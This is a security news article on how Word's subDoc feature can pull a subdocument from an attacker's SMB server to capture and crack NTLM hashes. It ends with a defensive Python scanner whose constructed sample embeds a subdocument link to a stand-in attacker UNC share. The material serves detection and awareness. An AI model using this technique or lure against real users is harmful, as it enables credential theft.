Little-Known MS Word Feature Can Be Used to Steal Passwords

Researchers from Rhino Labs have described a new method for stealing Windows credentials using a little-known MS Word feature called subDoc. This feature allows a document to load another document into its body. It can also be used to remotely load subDoc files into the main document, making it possible to exploit this functionality for malicious purposes.

How the Attack Works

The new technique is based on the classic pass-the-hash attack, a type of replay attack. This method allows an attacker to authenticate to a remote server that uses the NTLM or LM authentication protocol. The attack can be used against any server or service that relies on NTLM or LM authentication, regardless of the victim's operating system.

In systems using NTLM authentication, passwords are never transmitted in plain text. Instead, they are sent as hashes during the challenge-response authentication process. Attackers can create a Word file that loads a subdocument from a malicious SMB server under their control. When the victim's Word client connects to that server to fetch the subdocument, it authenticates automatically, and the server records the NTLM hash from the exchange. There are many tools available today that can crack these hashes and extract credentials. With this information, attackers can access the victim's computer or network as if they were the original user.

Targeted Phishing Campaigns

This type of attack is particularly effective for targeted phishing campaigns aimed at high-value targets such as businesses or government agencies, according to experts.

Detection and Prevention

According to researchers, this attack method is not yet widely known, so most antivirus solutions do not detect it. The researchers have published a tool on GitHub called SubDoc Injector, which allows users to create malicious Word documents. This tool is intended to help system administrators and security professionals conduct their own testing and assessments.
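Because the subdocument link lives in the document's OOXML relationship part, a defender can triage incoming .docx files without opening them in Word. The scanner below is an added example, not code from Rhino Labs or the SubDoc Injector tool: it unzips a .docx, reads `word/_rels/document.xml.rels`, and reports every external relationship whose target is a UNC path or URL, singling out the `subDocument` relationship type described in the article. The sample document and its host name are constructed for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SUBDOC_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/subDocument"
RELS_PART = "word/_rels/document.xml.rels"


def is_remote_target(target: str) -> bool:
    # UNC paths (\\host\share) and URLs make Word reach out over the network;
    # a relative target such as chapter2.docx stays on the local machine.
    t = target.strip().lower()
    return t.startswith("\\\\") or t.startswith("//") or "://" in t


def scan_docx(data: bytes) -> list:
    # Return (rId, short relationship type, target) for each external, remote link.
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if RELS_PART not in z.namelist():
            return findings
        root = ET.fromstring(z.read(RELS_PART))
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        if is_remote_target(target):
            findings.append((rel.get("Id"), rel.get("Type", "").rsplit("/", 1)[-1], target))
    return findings


def has_remote_subdoc(data: bytes) -> bool:
    # The specific indicator from the article: a subdocument fetched from a remote host.
    return any(kind == "subDocument" for _, kind, _ in scan_docx(data))


def build_sample_docx(rels_xml: str) -> bytes:
    # Constructed minimal .docx holding only the parts the scanner reads.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed sample: a subdocument on a UNC share (placeholder host, not a real
# indicator) next to an ordinary hyperlink, so both kinds of remote link show up.
SAMPLE_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId5" Type="{SUBDOC_TYPE}"
     Target="\\\\attacker-host.example\\share\\sub.docx" TargetMode="External"/>
  <Relationship Id="rId6" Type="{REL_NS.rsplit('/', 1)[0]}/hyperlink"
     Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx(SAMPLE_RELS)):
        print("remote external relationship:", finding)
```

Run over a mail gateway's attachment queue, a `subDocument` hit with a UNC target is a strong signal worth blocking, while hyperlink hits are usually benign and only need logging.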